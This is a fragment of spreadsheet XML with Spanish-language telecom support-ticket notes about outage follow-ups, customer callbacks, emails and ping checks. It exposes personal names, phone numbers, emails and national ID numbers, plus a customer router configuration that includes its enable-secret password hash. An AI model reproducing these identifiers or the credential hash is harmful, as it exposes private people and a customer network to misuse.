    <t>SE LLAMA AL CLIENTE EVER LOPEZ 77126684 / 63072300, CLIENTE INDICA QUE EL INCONVENIENTE ES QUE SUS LLAMADAS ENTRANTES SE ESCUCHAN ENTRECORTADAS, COMENTA QUE LA PERSONA ENCARGADA DONDE ESTÁN LOS EQUIPOS NO SE ENCUENTRA HASTA EL LUNES POR LO QUE COMENTA QUE PROBARÁN REINICIAR SU PLANTA PBX EL DÍA LUNES YA QUE A NIVEL DE CLARO SE OBSERVA SIN PÉRDIDAS. REPORTARÁ NUEVAMENTE SI LUEGO DE SUS PRUEBAS CONTINUAN CON EL INCONVENIENTE. ID: 1001264929</t>
  </si>
  <si>
    <t>F4590056</t>
  </si>
  <si>
    <t>SE VALIDA QUE EL SERVICIO ESTA ESTABLE Y SE VALIDA QUE EN LA LAN SE CONTACTA A DANIEL  RAMOSA AL 79645308  ID 1001261873 EN EL QUE SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE LO VALIDARA Y AUTORIZA EL CIERRE DE LA FALLA Y TICKET SE NOTIFICA AL GESTOR DARWINH.ESPANA VIA SKYPE</t>
  </si>
  <si>
    <t>F4590080</t>
  </si>
  <si>
    <t>CLIENTE MANUEL PASCUAL 73407993 REALIZA PRUEBAS Y VALIDA EL E1 ESTABLE Y OPERATIVO. AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050373407993
NÚMERO: 0050373407993
INICIO: HOY, 08:13 A. M.
FIN: HOY, 08:17 A. M.
DURACIÓN: 4:21
ID DE LLAMADA: 1001688548</t>
  </si>
  <si>
    <t>F4590083</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE JAIME CASTILLO E INDICA QUE SERVICIO YA SE ENCUENTRA FUNCIONANDO DE MANERA CORRECTA, SE PROCEDERÁ AL CIERRE DEL TICKET. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE CASTILLO JAIME 78543971  QUIEN   INDICA QUE PRESENTA RUIDO EN LAS LLAMADAS, SE VALIDA QUE EL PUERTO MSAM NO TIENE ERRORES, CLIENTE  INDICA QUE EN OCASIONES ANTERIORES POR EL COBRE LE HA GENERADO PROBLEMAS EN EPOCAS DE LLUVIA Y SOLICITA SE COORDINE VISITA PARA EL DIA LUNES 06/06 A LAS 17 HORAS PARA REVISIÓN DEL COBRE. NO SE REQUIERE TRAMITAR PERMISOS PARA INGRESO AL SITIO. LLAMADA DESDE VI-VO
EL DIA LUNES SE LE LLAMARÁ AL CLIENTE A LAS 10 HORAS PARA CONSULTAR LOS NOMBRES DE LAS PERSONAS QUE ESTARAN EN CADA SITIO DE LOS E1 REPORTADOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JAIME CASTILLO, NO RESPONDE, SE CONTACTARÁ MAÑANA 07/06 EN HORARIO HABIL
1001658810
COLA:
NOMBRE: A: 0050378543971
NÚMERO: 0050378543971
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378543971
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/06/2022 18:16:19
1001658835
COLA:
NOMBRE: A: 0050378543971
NÚMERO: 0050378543971
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378543971
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/06/2022 18:16:27
1001658887
COLA:
NOMBRE: A: 0050325202004
NÚMERO: 0050325202004
DURACIÓN: 0:00:22
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050325202004
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/06/2022 18:16:31</t>
  </si>
  <si>
    <t>F4590092</t>
  </si>
  <si>
    <t>SE LLAMA AL PR DANI CIENFUEGOS 42045050 ID 1001269773 / 1001269907 NO RESPONDE, SE LLAMA AL OTRO NUMERO REGISTRADO 22153693 ID 1001270005 ATIENDE ANDRES ESQUIVEL QUIEN ES EL CL  Y SE LE  COMENTA LA CRONOLOGÍA Y COMENTA QUE LE BRINDARA EL SEGUIMIENTO Y COMO ES DE SU LADO VERIFICARA AUTORIZA EL CIERRE DE LA FALLA Y TICKET SE NOTIFICA AL GESTOR  WAGNER.POLANCO VÍA SKYPE</t>
  </si>
  <si>
    <t>F4590093</t>
  </si>
  <si>
    <t>INFORMA JASMIN GARRIDO QUE AÚN ESTÁ EN ALMUERZO, PERSONA QUE NOS ATIENDE INDICA QUE LOS EQUIPOS ESTÁN EN LO ALTO Y NO TIENEN ACCESO POR LO QUE NO PUEDEN APOYAR A VERIFICAR, SOLICITA QUE SE ENVÍE PERSONAL TÉCNICO. ATIENDEN HASTA LAS 7 PM. ID: 1001271146</t>
  </si>
  <si>
    <t>SE VALIDA QUE AUN NO TIENE MOVIMIENTO SOLO INDICA QUE SE LE LLAMARA Y NO HAY REPORTE DEL MISMO, SE LLAMA AL  PR ASMIN GARRIDO AL 33121789 ID  1001266117 COMENTA QUE NO ESTA EN EL SITIO ESTA EN SU HORA DE ALMUERZO BRINDA EL NUMERO 79265000  PARA EL SEGUIMIENTO ID 1001266694 ATIENDE ANA BARRERA Y CONFIRMA AUN LA FALLA POR LO QUE SE CONTACTA CON EL GESTOR SAQITZUNUN.COJTI AL 8124 ID 1001266841 SE DEJA EN LINEA CON EL PR</t>
  </si>
  <si>
    <t>F4590130</t>
  </si>
  <si>
    <t>SE LLAMA A JUAN CARLOS ESTRADA AL 30755100 ID 1001296818 PARA EL SEGUIMIENTO DEL CONTACTO EN EL PR YA QUE EL ACTUAL CONTACTO DE SHERELIN NO ESTA EN EL SITIO, COMENTA QUE YA REGRESO EL SERVICIO Y NO SERA NECESARIO MAYOR INTERVENCIÓN, CONFIRMA EL CIERRE DEL TICKET Y FALLA SE NOTIFICA AL GESTOR JOSE.OCHOA VIA SKYPE</t>
  </si>
  <si>
    <t>SE HABLÓ CON SHERLIN TIRADO/PR 30757564 INDICA QUE NO ESTA EN PR; SE LLAMÓ A JUAN CARLOS ESTRADA/CENTRAL 30755100 SE LE ESTABA PIDIENDO APOYO CON TELS ADICIONALES CORTA LA LLAMADA, SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4590151</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR ALDANA 32573659 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001477009</t>
  </si>
  <si>
    <t>F4590185</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CAIDO, SE CONSULTA A PERSONAL DE BANCO AZTECA SOBRE EL ESTADO DE LA AGE
COMMAND PING FOR NODE CC_AZTECA_GT_GCC341127 (10.212.118.210)
TOOLS: ERROR, TOOL 'PING' FAILED WITH EXIT CODE 1.
PING 10.212.118.210 (10.212.118.210) 56(84) BYTES OF DATA.
--- 10.212.118.210 PING STATISTICS ---
3 PACKETS TRANSMITTED, 0 RECEIVED, 100% PACKET LOSS, TIME 12000MS</t>
  </si>
  <si>
    <t>F4590189</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS EDUARDO VIELMAN 57748704 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001479793</t>
  </si>
  <si>
    <t>F4590212</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, EL CLIENTE SOLICITA MONITOREO DE 48 HORAS FINALIZANDO  EL DÍA MARTES 07/06/2022 A LAS 13:22 HORAS SE NOTIFICA AL GESTOR RAMOS.MARLON VIA SKYPE PARA EL CAMBIO DE ESTADO.</t>
  </si>
  <si>
    <t>F4590288</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RONALD RENDEROS AL 75256743  - 76899727 NO RESPONDE EN EL PRIMER NUMERO Y EN EL SEGUNDO SOLICITA QUE SE LE LLAME EN 45 MIN **
ID 1001469576 - 1001469667
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONALD RENDEROS 76899727 MENCIONA QUE EL INCONVENIENTE ES CON EL CORREO, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001488111</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RONALD RENDEROS 76899727 NO RESPONDE, SE INTENTARA LUEGO**
ID 1001466600
**</t>
  </si>
  <si>
    <t>F4590316</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
SÁB 04/06/2022 5:36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729¿¿ ¿¿¿¿¿¿¿¿¿¿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0316¿¿
ID: 47502542T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1729
UBICADO EN:
CAJERO 1729 GASOLINERA DON ARTURO14.41192381  -91.306304
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.</t>
  </si>
  <si>
    <t>F4590340</t>
  </si>
  <si>
    <t>***--- TELMEX COMPARTE CONTACTOS LOCALES ---***
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: DOMINGO, 5 DE JUNIO DE 2022 04:52
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GONZALEZ ORTIZ JULIO CESAR &lt;GOJULIO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4318945 :: TICKET CNOC IMDHE020619 ::: "FUERA DE SERVICIO"
BUEN DIA
COMPARTIMOS LCON
CABALLERO DONALD
505-8-2070642,505-2-25152544
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL SR. WILVER SR. WILVER INDICA QUE ESTA EN SITIO PERO QUE EL ENLACE ESTA ESTABLE Y REALIZO PING EXTENDIDO INDICA NO TENER PERDIDAS Y QUE ESTA TRABAJANDO CON EL ENLACE PRIMARIO || SE NOTIFICA A GESTOR**
ID 1001467102
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 00 52 55 5174 5290 CONTESTA LA SEÑORITA ILEANA CONFIRMA SERVICIO ESTABLE AUTORIZA CIERRE DEL TICKET **
ID 1001471039
**</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA POR PARTE DE CLIENTE///QUEDAMOS A LA ESPERA, SE CONSULTA NUEVAMENTE
ELVYN ARIEL LOPEZ RECINOS
BUEN DÍA ESTIMADOS;
QUEDAMOS A LA ESPERA DE CONTACTOS DE SITIO Y HORARIO DE ATENCIÓN.
SALUDOS</t>
  </si>
  <si>
    <t>F4590392</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN FARFAN AL 50002641  CONFIRMA SERVICIO ESTABLE Y
 AUTORIZA CIERRE DE TICKET **
ID 2001590507
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN FARFAN AL 50002641  NO RESPONDE || ENVIA A BUZON || SE
INTENTARA LUEGO **
ID 2001577616
**</t>
  </si>
  <si>
    <t>F4590395</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN FARFAN AL 50002641  NO RESPONDE || ENVIA A BUZON || SE
INTENTARA LUEGO **
ID 2001577616
**</t>
  </si>
  <si>
    <t>F4590404</t>
  </si>
  <si>
    <t>SE MANDA CORREO A CLIENTE
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 5 DE JUNIO DE 2022 18:11
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: G307 - ENLACE DE DATOS CLARO ID 629100060T
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL REPORTE ES NECESARIO QUE NOS PUEDAN APOYAR EN COORDINAR ACCESO AL CENTRO COMERCIAL EN DONDE SE UBICA EL PUNTO DE VENTA, ESTO DEBIDO SE TIENE EL PUERTO DE COBRE DOWN QUE VA HACIA LAS INSTALACIONES, SU APOYO COORDINANDO LOS ACCESOS CON LA ADMINISTRACIÓN DEL COMERCIAL PARA MAÑANA A LAS 9:00 AM PARA EL SIGUIENTE PERSONAL:
EDGAR DANIEL GOMEZ MENDEZ                       DPI     1628 97243 1401
JUAN ALBERTO TRUJILLO ORTIZ                          DPI     2487 19076 0115
DANIEL ENRIQUE MONTENEGRO CARACUN    DPI      2414 54425 0101
QUEDAMOS ATENTOS A LOS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE SELVIN COMENTA QUE EL NO PUEDE HACER EL PROCESO YA QUE NO TIENE COMO ENVIAR, COMENTA QUE LO DEBE REIVSAR LA CENTRAL, SE LE INDICA QUE SU CENTRAL FUE LAS QUE NOS DIJO QUE NOS ABOCARAMOS CON EL PARA EL SEGUIMEINTO, COMENTA QUE VALIDARA CON LA ADMIN DEL COMERCIAL Y QUE SE LE MARQUE DE NUEVO EN 15 MINUTOS.</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO CONSULTANDO DE NUEVO CONTACTOS Y HORARIO -**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 5 DE JUNIO DE 2022 05:07
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 307
BUENOS DÍAS ESTIMADO SR. SIERRA.
                CONTINUANDO CON EL SEGUIMIENTO, DE SER POSIBLE PODRÍA INDICARNOS UN NUMERO CELULAR DEL PERSONAL EN SITIO
ADICIONAL CONFIRMAR EL HORARIO DE LABORES YA QUE PODRÍA SER POR ESTA RAZÓN QUE NO HEMOS LOGRADO CONTACTARLOS AL NÚMERO QUE NOS PROPORCIONA ORIGINALMENTE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4590425</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO RODRÍGUEZ  AL 503 2515-0000 EXT  2006  CONTESTA EL SEÑOR FRANCISCO ASENCIO CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET **
ID 1001476533
**</t>
  </si>
  <si>
    <t>F4590611</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  79301553 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001502912</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 79301553 CONTESTA EL SEÑOR ERICK INDICA QUE NO SE ENCUENTRA EN SITIO QUE SE LE LLAME EN 30 MIN NUEVAMENTE **
ID 1001479976 - 1001481126
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL SEÑOR ERICK AL 79301553  SOLICITA QUE SE LE LLAME EN 30 MIN NUEVAMENTE **
ID 1001502051
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE PR 79301553 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001493008</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR AL 79301553  ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001529861
**</t>
  </si>
  <si>
    <t>F4590627</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE LUIS, CLIEN INDICA APLICO REINICIO A LOS EQUIPOS Y CON ELLO EL SERVICIO RESTABLECIO POR LO QUE AUTORIZA CIERRE DE CASO.
1001382011
COLA:
NOMBRE: A: 36037608
NÚMERO: 36037608
DURACIÓN: 0:02:13
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 36037608
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 08:35:44</t>
  </si>
  <si>
    <t>F4590637</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN PR YESENIA RODRIGUEZ 40580657 QUIEN VALIDA SERVICIO OPERATIVO,
1001403568
COLA:
NOMBRE: A: 40580657
NÚMERO: 40580657
DURACIÓN: 0:09:45
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 40580657
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 5/06/2022 11:33:06</t>
  </si>
  <si>
    <t>SE LLAMA A SUPERVISOR SIN TENER RESPUESTA</t>
  </si>
  <si>
    <t>EN COMUNICACION CON DAVID MONTENEGRO PARA ASIGNACION TECNICA</t>
  </si>
  <si>
    <t>SIN RESPUESTA PARA ASIGNACION TECNICA</t>
  </si>
  <si>
    <t>SE LE INDICA A YESENIA QUE ESTARA LLEGANDO EL PERSONAL TECNCIO EN APROX 40 MINUTOS,</t>
  </si>
  <si>
    <t>F4590659</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 5 DE JUNIO DE 2022 17:46
PARA: AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; VITAL CUEVAS OSCAR ALBERTO &lt;OVCUEVAS@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1613947OH ::: TICKET CNOC IMBBL004124 ::: ENLACE INACTIVO
BUENAS TARDES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO SE OBSERVA ENLACE OPERATIVO ALCANZABLE A NIVEL DE PING DE FORMA ESTABLE. SE OBSERVA EN LA INTERFAZ DEL EQUIPO DE ACCESO QUE EL CLIENTE QUEDA RESTABLECIDO DESDE APROXIMADAMENTE 2022-06-05 15:35:30. POSIBLES TEMAS DE ENERGÍA EN PUNTO REMOTO. QUEDAMOS AL PENDIENTE, GRACIAS DE ANTEMANO.
&lt;CSCYHNLJN1D1EIM1&gt;PING -C 500 -S 1450 -M 40 -B 190.107.139.33
  PING 190.107.139.33: 1450  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 190.107.139.33 PING STATISTICS ---
    500 PACKET(S) TRANSMITTED
    500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A TELMEX
RE: SOLICITUD DE SOPORTE ::: ID LOCAL 1613947OH ::: TICKET CNOC IMBBL004124 ::: ENLACE INACTIVO
AXEL SAMUEL LOPEZ ORTIZ
BUENOS DÍAS ESTIMADOS.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO, NOS PUEDEN APOYAR BRINDANDO CONTACTOS EN PUNTO REMOTO, PARA REALIZAR DESCARTES DE PRIMER NIVEL.
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4590672</t>
  </si>
  <si>
    <t>SE  CONVERSA CON CLIENTE  ESTEFANIE  GRIJALVA, INDICA QUE SERVICIO SE ENCUENTRA OPERATIVO, EXCEPTO POR LA LINEA TELEFONICA, Y SE CORTA LA LLAMADA, SE INTENTARA LUEGO.
1001389751
COLA:
NOMBRE: A: 51725620
NÚMERO: 011 50251725620
DURACIÓN: 0:02:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:INTERFUNCIONAMIENTO SIN ESPECIFICAR (CÓDIGO 127 CAUSA ISDN)]
DETALLES: +50251725620
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 5/06/2022 09:45:14</t>
  </si>
  <si>
    <t>F4590681</t>
  </si>
  <si>
    <t>SE LE LLAMA A PR 47877251 CALUDIO SULA ID: 1001413945 / COMENTA QUE NO TIENEN ENERGIA EN PDV DESDE AYER | SE NOTIFICA A JHONNSER.ESCOBAR VIA SKYPE PARA EL CIERRE DE INCIDENTE | WIP</t>
  </si>
  <si>
    <t>F4590702</t>
  </si>
  <si>
    <t>SE LLAMA A PERSONAL DE INFINITUM DOUGLAS 22790909 A QUIEN SE LE INDICA LA SITUACION DE QUE LA FIBRA NO PERTENECE A CLARO, SOLICITAN SE LES COMPARTE DOCUMENTO EN EL CUAL INFINITUM DESLINDA A CLARO DE RESPONSABILIDAD
SE ENVIA CORREO A INFINITUM || PENDIENTE QUE RESPONDAN Y SE UTILIZA ETAPA PENDIENTE CLIENTE
1001435846
COLA:
NOMBRE: A: 22790909
NÚMERO: 22790909
DURACIÓN: 0:11:23
ESTADO: CONECTADA
DETALLES: 22790909
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 5/06/2022 16:01:18
ASUNTO: RE: SD 1132324 ID:617800055T
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADO DOUGLAS.
EN SEGUIMIENTO AL SERVICIO 617800055T | INFINITUM S.A. || CANTON ROSARIO CERCA COOPERATIVA INTEGRAL DE AHORRO SANTA EULALIA HUEHUETENANGO SANTA EULALIA.
LE COMENTO QUE EL PERSONAL DE FIBRA ÓPTICA AL TRASLADARSE SE PERCATA QUE EL TRAMO AFECTADO NO ES PROPIEDAD DE CLARO, EN DOCUMENTACIÓN PARA EL SERVICIO 617800055T VEMOS UN DOCUMENTO DE "CARTA DE RESPONSABILIDAD DE ULTIMA MILLA" EL CUAL FUE FIRMADA POR INFINITUM INDICANDO QUE LES PERTENECE LA FIBRA A USTEDES.
TE ADJUNTO EL DOCUMENTO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4590722</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE CRUZ SANCHEZ   82386140  MENCIONA QUE EL INCONVENIENTE ES CON UN SERVICIO RESIDENCIAL POR LO QUE YA LO REPORTARON EN NI SERVICIOS RESIDENCIALES
CLIENTE MENCIONA QUE ESTE SERVICIO (CORPORATIVO) ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001785530</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE AUGUSTO GONZALEZ 84017527 SOLICITA QUE SE LE LLAME EN 1 HR **
ID 1001484459
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE AUGUSTO GONZALEZ AL 84017527 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001523214
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE AUGUSTO GONZALEZ AL 84017527 SOLICITA QUE SE LE LLAME EN 30 MIN YA QUE ESTA EN UNA REUNION**
ID 1001528586
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE AUGUSTO  84017527 QUIEN BRINDA CONTACTO DE PR CRISTIAN GUTIERREZ - 82386139  PERO SOLICITA SE LLAME EN 10 MIN
-ID 1001552029</t>
  </si>
  <si>
    <t>F4590787</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE GREGORIO GARCIA 42440047 ID: 1001422075 /
SE DEJA EN CONFERENCIA CON JURGEN.BOCH PARA PRUEBAS PENDIENTES  | WIP</t>
  </si>
  <si>
    <t>F4590792</t>
  </si>
  <si>
    <t>SE LLAMA A CONTCTO UBICADO EN TICKETS ANTERIORES EDGAR CUELLAR SIN EMBARGO NO SE OBTIENE RESPUESTA.
1001415926
COLA:
NOMBRE: A: 51159013
NÚMERO: 51159013
DURACIÓN: 0:00:57
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 51159013
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 5/06/2022 12:55:47</t>
  </si>
  <si>
    <t>F4590822</t>
  </si>
  <si>
    <t>SE DA RESET A CISCO Y SE RECUPERA GESTION
F4590822
CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5509 BYTES
!
! LAST CONFIGURATION CHANGE AT 21:45:30 UTC SUN JUN 5 2022
!
VERSION 16.9
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_BELLUNO_GT_INTERNET_6TA_CALLE_QUETZALTENANGO
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$BQPM$79K0MRCNVDO156SL9IYJA1
!
NO AAA NEW-MODEL
!
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
!
IP DHCP POOL CLIENTE
 NETWORK 192.168.1.0 255.255.255.0
 DNS-SERVER 8.8.8.8
 DEFAULT-ROUTER 192.168.1.1
 LEASE 0 2
!
!
!
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-1756368075
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1756368075
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1756368075
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1756368075
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31373536 33363830 3735301E 170D3139 31303134 31393038
  30335A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 37353633
  36383037 35308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 0100C7FB F436F8FF F25B0533 1947F15E B5A16D27 9950DDAE D9B0AA1F
  20F39FB0 CE74E2A5 F6224BB8 AD793256 41001A23 9EECC5F2 8A34126D 72E6DB65
  C0F676CA 670E49B9 F9B28DE0 7C31394F 9F5ACE69 59EE58CA 6FE802BB FB614C52
  8269D9CE E583E5AB AB6339E1 0836F5C6 8BE3213E 1EC6EBCF 073A2ED7 32452F6C
  7F2BC878 6E242870 F02FA822 28F46B4E A4696390 4AD0CFDE A41C73C8 714EEBCC
  1CF57D66 FFB95CA0 C0EAC586 219B14B3 C799FC5D 88924FA3 669E07FE 0DCC971C
  09E0BAD3 E5D66545 581EA111 97472F2B 60A2109D D481BFD7 1BABC4FF 183A8DC8
  AEE09B4A 62F2AF75 9DD15579 CD0950B8 01DED161 D87BF311 D038B4FC 405A4B69
  75D4A09D 0F7F0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
